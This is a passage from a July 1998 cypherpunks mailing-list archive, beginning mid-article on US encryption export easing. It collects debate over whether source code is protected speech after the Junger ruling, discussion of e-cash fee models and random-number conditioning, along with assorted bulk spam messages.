chartered in countries that have agreed to take steps against
money-laundering. If U.S. companies want to sell to financial
institutions chartered in other countries, they will have to
apply for licenses from the Commerce Department.

Such provisions still fall short of the demands of U.S.
companies. "To take a piecemeal approach [to loosening
encryption restrictions] is the wrong direction," said Ed
Gillespie, executive director of Americans for Computer
Privacy, a lobbying group. "We need a blanket lifting of
restrictions with individual prohibitions," such as bans on
sending such technology to terrorist states, he said.

In a related development, a federal court in Ohio ruled on
Friday that posting the text of an encryption program on the
Internet, where people all over the world could see it, was not
protected by the constitutional right to free speech.

The ruling, made late Friday, contradicts a ruling made by a
California district court last August. Privacy advocates predict

that the issue will be taken up by the U.S. Supreme Court. 

(c) Copyright 1998 The Washington Post Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <root@ssds.com>
Date: Tue, 7 Jul 1998 11:29:21 -0700 (PDT)
To: Ernest Hua <Hua@teralogic-inc.com>
Subject: RE: Junger et al.
In-Reply-To: <413AC08141DBD011A58000A0C924A6D52C359C@mvs2.teralogic-inc.com>
Message-ID: <Pine.LNX.3.96.980707120752.562A-100000@mothra.fastrans.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, 6 Jul 1998, Ernest Hua wrote:

> I think we are in violent agreement here ...
> 
> Except that it seems odd that speech is no longer 1st amendment
> protected as soon as it can be interpreted by a machine to do something.
> So, then, if I want to deny you first amendment protections for
> something, I can simply write a compiler to turn your words into machine
> executable code, and suddenly, your words are no longer protected
> speech.  How could that be a reasonable interpretation of functional
> versus not?
> 

Obviously there is no difference between 10 lines of PERL and
1500 lines of assembler (or machine code).  Executability is in the
eye of the beholder.  I can create an interpreter to execute english
(and in fact have done so in LISP).  Does that mean english is no longer
protected?

By the same argument, DNA is also a device.  The federal government
can now determine who you can reproduce with. (eugenics?)

DNA strands are instructions, code if you will, that describe to
cellular automata (literally ;-), how to (1) create a human being
(that could be dangerous -- they've been known to kill) and
(2) through fantastic complexity generate a fully functioning
human being, with all the behavioral patterns and biological
operations necessary to sustain said human being.

Imputing "deviceness" to code is missing the point.  There is
"deviceness" in all information.  It just depends on the context.

I would argue that it is specifically this "deviceness" that is protected
in the first amendment.  Speech isn't just about yammering on about
abstract concepts.  The imperative form of speech is probably the
most necessary to protect in a free society.

The most sacred form of democratic speech is probably the
vote.  Does it contain "deviceness"?  Absolutely.  The vote
is democratic force.

Is it not protected speech?

Speech in action is code in action.  When they can make code
illegal, they can make comittees to un-elect illegal and they
can make talking about impeaching the president illegal.

Think about that.

PostScript: It seems its not so much speech they don't like.
They don't like us talking to our computers, because there are
some things that computers do that are very powerful.  Maybe
more powerful than the state can handle.

In other words, I can tell Jan Hammer in Germany exactly how
to do what PGP does.  It might take him an infinity to actually
do it, but that speech is protected.  When I tell Jan's computer
how to do it, its illegal.

So speech is ok as long as its ineffective.  If it can actually
effect change then its illegal.

Interesting notion of free speech.

jim


-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
Charset: noconv

iQA/AwUBNaJpoulhVGT5JbsfEQJU/gCgziy0U50OJXycwYNZPd4XsUuQfP8An3NY
BiWWWH8zvcvdVgKf2AM9ANu6
=6abs
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Tue, 7 Jul 1998 10:53:49 -0700 (PDT)
To: mgraffam@mhv.net
Subject: RE: Junger et al.
In-Reply-To: <Pine.LNX.3.96.980707030820.4214B-100000@ismene>
Message-ID: <Pine.SUN.3.91.980707123907.25394A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Jul 1998 mgraffam@mhv.net wrote:

> Indeed.. what we need is for someone to testify to the court about
> natural and computer language, and maybe some relevent material from
> information theory. 

	What we need, IMO, is a well-placed stunt or two.

	On sci.crypt a while ago I mentioned that if perl-RSA got
	any smaller, one could make it the *subtitle* of one's next
	book:  "Blah blah blah:  what ``/usr/bin/perl blah blah blah
	...'' means."

	The result would be a book, with book-like 1st amendment
	protections, but which would turn ONLINE library card 
	catalogs into online repositories for strong crypto.  Need RSA?
	Look up the book, cut and paste into a shell.  Ta Daaaa!
	You're an evil terrorist.

	The point of this is to drive home the fact that while
	source code is something that *does* (i.e., a device),
	it's also something that *says*.  It's information, even
	if executable information, and cannot be dispatched as 
	easily as a gun or a bomb.  Should the government attempt
	to declare a book title a munition, it'll fer sure end up
	in CNN fringe.

> Pseudo-code from any computer programming textbook would be helpful
> in making this point too.

	You'd need to prove it easily runnable.  What's the tech
	status of OCR via, say, a minicam?  If you could just 
	hold a page of _Applied Crypto_ up to your computer and
	have it gleen C source (much easier than gleening English),
	It'll demonstrate the fuzziness of these things (again, IMO) 
	in much starker terms than would just using a scanner.

	Another project would be to collect all our number theory
	and abstract algebra books, and type in verbatim the sections
	on RSA.  These usually contain instructions somewhere between
	pseudocode and conversational English.  If someone could 
	for a Masters thesis develop a program capable of reading 
	that stuff...

							-Caj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John R Levine <johnl@iecc.com>
Date: Tue, 7 Jul 1998 11:20:03 -0700 (PDT)
To: "Arnold G. Reinhold" <reinhold@world.std.com>
Subject: Re: IP: "CyberCash can't oust credit cards"
In-Reply-To: <v03130308b1c7c7a655e2@[24.128.118.45]>
Message-ID: <Pine.BSI.3.91.980707141507.11216i-100000@ivan.iecc.com>
MIME-Version: 1.0
Content-Type: text/plain


> >2. Three orders of magnitude cost reduction.

CyberCash's entire business model for e-cash is wrong.  They ask for a 4%
slice of each transaction, which is absurd.  How much do issuers of real cash
ask per transaction?  Zero, of course. 

As I've mentioned before, the way you make money with money is seignorage,
that is you print it and make your profit on the float and on coins that are
never redeemed.  Works great for travellers checks.  I suspect that Bob H.
would agree. 

Regards,
John Levine, johnl@iecc.com, Primary Perpetrator of "The Internet for Dummies",
Information Superhighwayman wanna-be, http://iecc.com/johnl, Sewer Commissioner
Finger for PGP key, f'print = 3A 5B D0 3F D9 A0 6A A4  2D AC 1E 9E A6 36 A3 47 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zida27@aol.com (Your Home Town)
Date: Tue, 7 Jul 1998 07:26:27 -0700 (PDT)
To: zida27@aol.com
Subject: Your Home Town Provides Everything You Need
Message-ID: <19980706199GAA18653@base.staffs.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



YOUR HOME TOWN 
WILL DO 100% OF THE WORK FOR YOU



WE OFFER:
You the chance to own your own Home Based Business.


WE OFFER:
To build your Home Based Business for you.


WE OFFER
You financial independence.


WE OFFER:
You life saving and life changing products.


WE OFFER:
You the easiest way we know to, improve your Health, your
Wealth and your Happiness.



For more information Call:

Our toll free 24 hr message center  at 888-771-9338

Our toll free 24 hr recorded message at 888-771-9340.



Reference # 1007698



our research showed you would be interested in this
subject.  If this is not true and you would like to be
removed from our data base please call 888-771-9338
and leave your e-mail address for removal. Thank You.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 7 Jul 1998 14:04:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: US to Ease Crypto Export
In-Reply-To: <199807071517.LAA25263@dewdrop2.mindspring.com>
Message-ID: <199807072104.RAA13648@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a bit more on this from the Dept of Commerce.
A press release that outlines the new policy and
lists the 45 select countries:

   http://jya.com/doc-ease.htm

Secretary Daley's speech today on broad export policy 
that touches on the crypto relaxation:

   http://jya.com/daley-expo.htm

BXA Under Secretary Reinsch's speech today:

   http://www.bxa.doc.gov/press/98/BillUPDS.html

The specific guidelines for easing of controls have not
yet been issued, as far as we can learn.

--------

The Junger decision is being scanned, later this evening
Peter will announce it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Tue, 7 Jul 1998 18:54:17 -0700 (PDT)
To: undisclosed-recipients:;
Subject: Announcing Extensis Preflight Pro 2.0
Message-ID: <bulk.21825.19980707160009@ssl.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


The Award-Winning, Preflighting Tool from Extensis Just Got Better. 
http://www.extensis.com/products/pfp2/


 New! Now supports all major graphics applications!
 Inspect, correct and collect print jobs for perfect prepress delivery.
 Advanced features include profiles, PDF creation, and AppleScript Automation.
 FREE!  5 free copies of Collect Pro 2.0 with each copy of Preflight Pro 2.0!


In May, Preflight Pro 1.0 received the 1998 Apple Design Award for 
Best Look and Feel. 
Just wait 'til they try 2.0.

The best just got better.

Extensis Preflight Pro is a comprehensive preflight solution designed 
to save prepress professionals significant time, money and materials.  
Preflight Pro inspects your documents and corrects problems to ensure 
they are error-free prior to printing.  

With an interface that mimics the traditional prepress workflow, 
Preflight Pro 2.0 provides you with a familiar environment to efficiently 
review files prior to printing. Further, Preflight Pro now supports 
documents in all the major graphics applications including Adobe 
PageMaker, Illustrator, Photoshop, QuarkXPress, Macromedia FreeHand, 
and Multi-Ad Creator2.


New in Preflight 2.0 is the capability to automate the preflight 
process. Based on your custom settings for pass/fail, Preflight Pro 
uses 'watch folders' to determine which files are complete and ready 
for printing. Users can set the automation window for tasks, such as 
collecting a job or running an AppleScript.

For greater utility, Preflight Pro now includes 5 free copies of 
Collect Pro 2.0. Give  Collect Pro to any creative professional you 
work with to help them perfectly collect a job for hand-off to the 
prepress house.  Collect Pro eliminates the problems of missing file 
information that can delay a job. 


Extensis Preflight Pro 2.0 will dramatically streamline your preflight 
workflow, saving you time, materials, headaches and money. 

In the world of preflighting, the best just got better.


Introducing your Extensis PREFLIGHT SPECIALIST!  For personal service 
or for more information, please contact your Preflight Specialist at 
(503) 274-2020 Ext. 167 or email to: mmoragne@extensis.com .

For more information, to order, or to download a FREE, 30-day demo of 
Extensis Preflight Pro, please visit our web site at 
http://www.extensis.com/products/pfp2/
Or call at (800) 796-9798 or (503) 274-2020.


* Preflight Pro is available for Macintosh users for $399.95 
(includes 5 free copies of Collect Pro 2.0).

* Special Extensis Customer Offer: Buy Preflight Pro for only $349.95 
(SAVE $50! Includes 5 free copies of Collect Pro 2.0).

* Special Upgrade Offer for PreFlight Pro 1.0 owners: Upgrade to 
Preflight Pro 2.0 for only $99.95 (SAVE $300! Includes 5 free copies 
of Collect Pro 2.0).




Preflight Pro 2.0 and Collect Pro 2.0 are compatible with 
QuarkXPress 3.31 or later, including QuarkXPress 4.0, Adobe 
PageMaker 6.5 and later, Adobe Illustrator 5.5 and later, 
Adobe Photoshop 3.0.4 and later, Macromedia FreeHand 5.5 and later, 
and Multi-Ad Creator2 version 1.0.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PS. We have made every effort to ensure this message is being sent 
only to people who have expressed interest in Extensis products.  
If we have sent this to you in error, please accept our apologies 
and reply with REMOVE in the subject line for automatic exclusion 
from future communications.  If you know someone who would like to
be on our mailing list have them send an email to 
listmaster@extensis.com with ADD in the subject line and their email 
address in the body.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 7 Jul 1998 18:07:45 -0700 (PDT)
To: ukcrypto@maillist.ox.ac.uk
Subject: thinking about you and http://www.qainfo.se/~lb/crypto_ag.htm
Message-ID: <35A2C56C.6A03@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 7/7/98 6:57 PM

Laszlo Baranyi

You DID NOT mention the Swiss radio international radio broadcasts.

http://www.qainfo.se/~lb/crypto_ag.htm

Rep McKinney and Sen Grassley now have copies.

Send me a snail mail address and I will send you a copy.

Using postcard, of course

 pob 14838
 abq, nm 87191
 usa

Gustavus J Simmons

  Cryptanalysis and Protocol Failures

  COMMUNICATIONS OF THE ACM, November 1994, vol 37, no 11, page 56

The 'spiking' story, in obscure language.

Simmons and R J Hanson http://sina.tcamc.uh.edu/~haskell/rjh/rjhres.html
were two of the most responsible people for me coming to Sandia from
Washington State U.

Here are two of my former Ph.D. students in computer science from wsu.

http://www.mhpcc.edu/general/john.html
http://www.friction-free-economy.com

NSA employee PAUL BRIDGE in about 1987 told me that Simmons was a
security risk and that I should not talk to Simmons.

In about 1992 I figured out something was fishy and began to talk to
Simmons again.

Simmons told me that he asked NSA employees Morris and Proto

  1  NSA is sorry it delegated responsibility for implementation
     of electronic locks in the us nuclear arsenal to Sandia.

  2  NSA wants the business back.

Simmons told me neither Morris or Proto would respond to his question.

Let's ALL   http://www.wpiran.org/  hope for settlement of this
UNFORTUNATE MESS.

bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Tue, 7 Jul 1998 13:36:45 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Kings & Queens/George Michael/Knocked up with NyQuil
Message-ID: <19980707193242.4256.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

STUFFED  Tue Jul 7 '98

<img src=http://stuffed.net/98/7/7/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/7/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 7 Jul 1998 11:41:03 -0700 (PDT)
To: cryptography@c2.net
Subject: RE: Junger et al.
Message-ID: <199807071841.UAA18158@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Nevermind that source code is suppose to be "human readable" material that
is _translated_ into function instructions of machine code.

A play is normally considered 'protected' free speech under US law, but
what if robot was created which acted out the play and Gwin's argument was
extended to apply the situtation where a play performed. Would the play
itself no longer be a protected form of free speech, because it is seen as
"functional" instructions to the robot actor? Would the playwrite become
responsible for the robot's actions, such as killing a character/actor?

As a programmer, I have "acted out" source code myself, as part of the
debugging process. It is normally called "a walkthrough," so the difference
between source code and a play is not as broad as some people may view it.
I have followed the source code like a script, acting out the instructions
like stage directions in a play.

Does it matter who might 'read' the material, in regards to the protection
of free speech? Whether it is written so that Russians or computers might
be able to read it? If source code is written on a napkin, it can be
currently exported, but what if tomorrow a vendor announces a 'napkin
computer' which can directly read from napkins akin to a super-low densiy
floppy disc.


At 07:20 PM 7/6/98 -0700, Ernest Hua wrote:
>Did anyone demonstrate the "functionalness" of any arbitrary language
>via a scanner and a compiler?
>
>Why doesn't Gwin understand that the moment one successfully claims that
>a specific class of source code is not speech by the virtue of the fact
>that a compiler can transform it automatically into executable code
>which performs a function, then ANY speech of ANY sort is fundamentally
>vulnerable to being classified as functional as soon as a compiler can
>transform it into real machine code.
>
>Ern
>
>	-----Original Message-----
>	From:	jkthomson [SMTP:jkthomson@bigfoot.com]
>	Sent:	Monday, July 06, 1998 7:12 PM


>	Reuters
>
>3:40pm  6.Jul.98.PDT WASHINGTON -- A district court has dismissed a law
>professor's challenge to US regulations strictly limiting the export of
>computer data-scrambling technology.
>
>Judge James Gwin ruled late Friday that the export limits, which prevented
>Case Western Reserve University Law School professor Peter Junger from
>posting the text of encryption programs on the Internet, did not violate
>the constitutional right to free speech.
>
>The Ohio court's ruling contradicts a California district court ruling last
>August that said source code -- the instructions a person writes telling
>the computer what actions to perform -- constitutes a form of speech
>subject to First Amendment protection.
>
>"Unlike instructions, a manual or a recipe, source code actually performs
>the function it describes," Gwin wrote. "While a recipe provides
>instructions to a cook, source code is a device, like embedded circuitry in
>a telephone, that actually does the function of encryption."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 7 Jul 1998 12:27:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: A note on the latest randomness quarrel
Message-ID: <199807071927.VAA23471@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


* Never use "the lowest few bits" or (t1>t2)?1:0 for the actual random
number generation.

You only use things like that for estimating the amount of entropy in a
source. The number of bits of entropy in a pile of bits is one more than
the base-two logarithm of the average number of guesses required of a
badguy knowing your condidtioning routine, observing what it can, and
interfering with your generator to figure out the value of the bits in the
pile, so if your studies and statistical analyses estimate that it
requires 2^127 guesses to guess the output of your conditioning routine,
good for you, you've estimated that somewhere in its input are 128 bits of
entropy. 

Um, I digress...point is, don't use that output straight. Take twice as
much unconditioned input, non-random-looking stuff and all, as you
estimate your conditioning routine needs to produce a key's worth of
entropy and _hash_it_. Your conditioning routine can introduce some little
bias you didn't see or make some unnoticed mistake that lets through
predictable bits. Hashing can, too, but we've studied the hash functions
to make sure they're good a lot more than we've studied your conditioning
procedure.

* A badguy's introduction of extra events doesn't poison your randomness.

A badguy could introduce a multitude of predictable-but-random-looking
events to make your generator close shop before it has enough
unpredictable events to get its entropy. However, that only works if extra
events make your generator stop collecting earlier. The amount of time it
spends collecting randomness shouldn't depend on _any_ output of the
generator, because that needlessly leaks entropy.

Also, a badguy could introduce two nearly-simultaneous events near the
beginning of the process, when it can be fairly sure that the wait between
its events and the previous event will make a zero or make the lowest few
bits of the delay between the bits match a certain value. (Interpreting
that sentence is left as an exercise to the reader :) However, you can
only do this in a system where your conditioning routine allows extra
events to cause the routine to output bad bets. However, if you hash your
raw data rather than using one of those conditioning routines, it's nearly
-- nearly, that's your cue to say it has to be always -- impossible to
weaken the output without knowing the other data hashed. 

Third, el badguy could introduce so many events that the gap between
events was always less than the measurement threshhold. However, note that
the Geiger counter, the computer, and the operator would all fail under
these circumstances. 

Therefore, pretty much any strategy allowing extra events to kill entropy
is flawed. 

================================================================================
	/// anonymous : nobody@replay.com : http://replay.com ///
================================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 7 Jul 1998 19:16:11 -0700 (PDT)
To: John R Levine <reinhold@world.std.com>
Subject: Re: IP: "CyberCash can't oust credit cards"
In-Reply-To: <v03130308b1c7c7a655e2@[24.128.118.45]>
Message-ID: <v04011731b1c8810ffc50@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:19 PM -0400 on 7/7/98, John R Levine wrote:


> CyberCash's entire business model for e-cash is wrong.  They ask for a 4%
> slice of each transaction, which is absurd.  How much do issuers of real cash
> ask per transaction?  Zero, of course.
>
> As I've mentioned before, the way you make money with money is seignorage,
> that is you print it and make your profit on the float and on coins that are
> never redeemed.  Works great for travellers checks.  I suspect that Bob H.
> would agree.

Pretty much. Actually, the model I like is one where transactions on the
net are free, but putting money *on* the net costs some smidge of money,
just like buying traveller's checks cost money, something like one or two
percent, I think.

You can't get any network effects, oddly enough, if you charge to take it
*off* the net, because merchants have to *pay* to participate. It would be
as if you had to pay to redeem a traveller's check. If that were the case
nobody would accept them. Pretty serious seignorage loss that would cause.
:-).

Again, I've a white paper on this. If anyone's interested, I'll send it to
them offline.  And, again, the dbs list folks have already seen it. :-).

Speaking of gratuitous plugs ;-), there are only two more days until I
close the subscription book on the symposium, and I still have some room.
See <http://www.philodox.com/symposiuminfo.html> and register now, if you
want to go.

Cheers,
Bob
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The Philodox Symposium on Digital Bearer Transaction Settlement
  July 23-24, 1998: <http://www.philodox.com/symposiuminfo.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 7 Jul 1998 16:32:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Apology
Message-ID: <199807072332.BAA17497@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Might have just posted a message intended for coderpunks to the list,
depending on whether toad still forwards.  Sorry. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@nudevision.com
Date: Tue, 7 Jul 1998 20:12:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FREE XXX VIDEO for your site !!
Message-ID: <03024203507064@nudevision.com>
MIME-Version: 1.0
Content-Type: text/plain


Thats right FREE XXX VIDEO for your website....

- increase traffic
- increase banner sales
- BOOST your profit
- Can be used by FREE SITE and PAY SITES

FREE SITE webmasters go to http://free.nudevision.com

MEMBERSHIP SITE webmasters go to http://www.nudevision.com/webmasters/index.htm

We are offering PAY SITE website webmasters 90 MINUTE FULL LENGTH MOVIES which
means SALES SALES SALES !!


EARN 10 BUCKS A RAW CLICK AND GET FREE TRAFFIC !! 

"WHAT? Are you guys nuts?"

Well maybe a little..... go to http://www.traffictraders2.com for
more details.

GAY SITE webmasters click here: http://www.studvision.com/webmasters/index.html

Best Regards,

The Cytron Gang

Cytron Technologies Ltd.
Cytron Communications Ltd.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Wed, 8 Jul 1998 02:05:26 -0700 (PDT)
To: Cypherpunks@toad.com (coolness)
Subject: New Page!
Message-ID: <634411ef.35a3361e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I made another page, which details what Capital records did to Dark Side of
the Moon when they reissued on cd.  Guess what they covered-up.  :-)  Check it
out,

Stan,
The Desecration of 'The Dark Side of the Moon'
http://members.tripod.com/StanSqncrs/DarkSide/darkside.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hizaici72@prodigy.com
Date: Wed, 8 Jul 1998 11:28:13 -0700 (PDT)
To: hizaici72@prodigy.com
Subject: Join StarDates.com, The Internet's Best FREE Dating Service!
Message-ID: <199807081009OAA45295@pimaia7y.csd.unbsj.ca>
MIME-Version: 1.0
Content-Type: text/plain


That's right! Stardates.com is the 
internet's best FREE dating service.

No gimmicks, no free trials that expire, just FREE
Click the link below:

http://209.2.134.99/

and select JOIN FREE from the menu options to fill out our on-line application.

All personal information is kept strictly confidential.

We even have an anonymous email system to keep your email address private.

So if your your looking to meet people,  join Stardates.com
Hey, what do you
have to lose?
Sincerely,
Michael Sole
Vice-President
StarDates
****************************************************
Bulk Email Advertising Works Best!!
This Could Have Been Your AD !!!
For Advertising Information Please Calll
1-510-653-4709  Evenings PST
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Wed, 8 Jul 1998 02:43:42 -0700 (PDT)
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: Junger et al.
In-Reply-To: <35A32D1C.C9CE9598@stud.uni-muenchen.de>
Message-ID: <Pine.LNX.3.96.980708053245.8170A-100000@ismene>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Jul 1998, Mok-Kong Shen wrote:
> Put the source code on a neuro-disk and you can export it under
> any crypto law that can ever be invented till eternity.

Maybe.. or we'll all be outlaws.. one of the two.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"86% of conspiracy theories have some basis in truth... but, oddly enough,
it's that last 14% that usually gets you killed." 
    --Talas (http://cadvantage.com/~algaeman/conspiracy/public.htm)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Wed, 8 Jul 1998 03:41:44 -0700 (PDT)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: IP: "CyberCash can't oust credit cards"
In-Reply-To: <v04011731b1c8810ffc50@[139.167.130.246]>
Message-ID: <199807081041.GAA16194@tana.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bob Hettinga wrote:
> At 2:19 PM -0400 on 7/7/98, John R Levine wrote:
> 
> 
> > CyberCash's entire business model for e-cash is wrong.  They ask for a 4%
> > slice of each transaction, which is absurd.  How much do issuers of real 
> > cash
> > ask per transaction?  Zero, of course.
> >
> > As I've mentioned before, the way you make money with money is seignorage,
> > that is you print it and make your profit on the float and on coins that are
> > never redeemed.  Works great for travellers checks.  I suspect that Bob H.
> > would agree.
> 
> Pretty much. Actually, the model I like is one where transactions on the
> net are free, but putting money *on* the net costs some smidge of money,
> just like buying traveller's checks cost money, something like one or two
> percent, I think.
> 
> You can't get any network effects, oddly enough, if you charge to take it
> *off* the net, because merchants have to *pay* to participate. It would be
> as if you had to pay to redeem a traveller's check. If that were the case
> nobody would accept them. Pretty serious seignorage loss that would cause.
> :-).

Haven't you said in the past that the *consumer* can't be charged anything to
use the system in the way of fees (consumer being the party bringing money into
the system), and that all fees need to get charged to the merchant (or whoever
the party is who removes money from the system)?

Certainly, at first order, the fee *should* be on removing money from the 
system, from a selfish point of view on the part of Ivan the Issuer -- if 
you're making money on seignorage, you're making money when people add money
to the system *and leave it there*.  Thus, you want to provide incentives for
people to buy money and leave it there -- charging no "on" fees and minimal
"off" fees would do it.  To ensure that people have faith in the cheap
convertability of electronic cash to real money, you could provide a highly
regressive fee structure for taking money out of the system -- if people
end up only redeeming their stuff through middlemen in huge batches, the
fees will go down very fast, and so will your costs.  The percentage cost
of shipping a billion dollars to a major customer in exchange for a billion
dollar token is much lower than shipping one billion one dollar bills to
a bunch of holders of one dollar tokens.  (This is an argument for regressive
fees, not for charging out rather than in, since it would apply just as well
to those who bought a billion tokens and then resold them, of course)

>From a *technical* standpoint, it makes sense to design an electronic cash
system to allow cheap coin-for-coin exchanges.  The marginal cost of a
transaction like this *is* 3 orders of magnitude less than one involving
a back-office system and wire transfer.  *This* is why electronic cash is
3 orders of magnitude cheaper than existing systems.  If you kludge a back
office system, a debit card system, and a wire transfer system onto the
backend, transactions going through that system don't get any cheaper than they
wold be in an unregulated traditional offshore bank.  As an issuer, you want
as few back-office processed transactions as possible, and those you do have,
should be as large as possible.

A better example is the credit card, rather than the traveler's check.  I've
*never* used a traveler's check, since I'm fundamentally annoyed by the idea
that I'd have to pay a fee to put my money into the system.  The *vast* 
majority
of consumers are unwilling to pay a fee to conduct a transaction they can
conduct in another way for free -- credit cards, cash, personal checks, wire
transfer, or whatever.  Merchants *already* pay money to handle money -- it's
just another cost of doing business.  For a merchant, processing *cash* costs
money, credit cards cost 1-4%, and I'm sure traveler's checks cost *something*
to handle.  I think it's a fundamental principle of financial psychology that
the resistance in going from a free service to a slightly charged service is
far higher than even a much larger increase in a service that already costs
money.

I think the ideal fee structure for an electronic cash issuer is:
* No cost to exchange coin-for-coin.  These cost you microcents anyway.
* Minimal (zero) cost to the public to issue cash.  This could be done by
selling large blocks of tokens at cost to issuers who are already in contact
with the public, and who get some kind of tangible benefit from processing
the transaction for the customer -- a pre-existing banking relationship that
wants a value-add, a retail store, a web site with advertising, whatever.
Primary market cash issuing might have a highly regressive fee structure, to
force secondary markets to come into being, but this is not essential.
* Secondary market redemption costs which *also* go to zero due to many 
players,
for the same reason as issuance.  Primary market should charge enough to
recoup redemption costs (charge for the wire transfer, or whatever), and 
potentially a regressive structure to help pay for operations costs.  
Optionally, the issuer could link through a proprietary and cheap protocol
their own bank accounts to the redemption of cash, making it much cheaper for
customers of the issuer's bank to redeem cash.  This is related to seignorage,
if these bank accounts are at the same bank which holds the backing accounts
for the currency.

A lot of people have discussed this fee structure, and I agree with them that
it is the best.

AFAIK, Mark Twain had a somewhat opposite fee structure, and look at how
successful they were...

This model is not really the credit card model (charge per transaction), nor
it is the traveler's check model.  It is the *cash* model -- banks and cash
handling companies charge handling fees for dealing with large quantities of
paper bills.  Think of user-to-user transactions as secondary market, 
withdrawing cash from the bank as primary market withdrawal, and exchanging
electronic cash for fiat money as the (currently hypothetical) step of 
redeeming bank notes for their backing, or something similar to taking physical
cash from retailer tills and getting it deposited to a cash management account.

It is electronic *cash*, after all.
-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 8 Jul 1998 05:17:29 -0700 (PDT)
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: IP: "CyberCash can't oust credit cards"
In-Reply-To: <v04011731b1c8810ffc50@[139.167.130.246]>
Message-ID: <v0401173cb1c905791ce6@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:41 AM -0400 on 7/8/98, Ryan Lackey wrote:



> Haven't you said in the past that the *consumer* can't be charged anything to
> use the system in the way of fees (consumer being the party bringing
>money into
> the system), and that all fees need to get charged to the merchant (or
>whoever
> the party is who removes money from the system)?

Nope, and, if I did, I was wrong. :-).

You probably can't bootstrap things on seignorage alone, I don't
think<double negative?>, but if you did, again, you would kill your digital
cash issue anyway, because of lack of merchant acceptance, especailly in
the early phases.

Note, in my canonical example, cash, that people already pay a fee for
"foreign" ATM withdrawls anyway, and people are used to doing things that
way. That's great, because I expect that margins on a net.ATM withdrawl
through an underwriter would be significantly higher than what a bank makes
on their non-customer ATM transactions. Three orders of magnitude cheaper?
I wouldn't be surprised.

> Certainly, at first order, the fee *should* be on removing money from the
> system, from a selfish point of view on the part of Ivan the Issuer -- if
> you're making money on seignorage, you're making money when people add money
> to the system *and leave it there*.  Thus, you want to provide incentives for
> people to buy money and leave it there -- charging no "on" fees and minimal
> "off" fees would do it.

Yup. But, oddly enough, that was Mark Twain's (final) fee structure, too.
Didn't save them in the end, though.

I just think that if merchants are the key to acceptance of digital bearer
cash, much less fully anonymous blinded digital bearer cash :-), then you
shouldn't charge merchants anything to accept the stuff. If a merchant can
download a wallet or registerware free or very cheap, and instantly start
taking cash payments for whatever they sell over the net, and, when it came
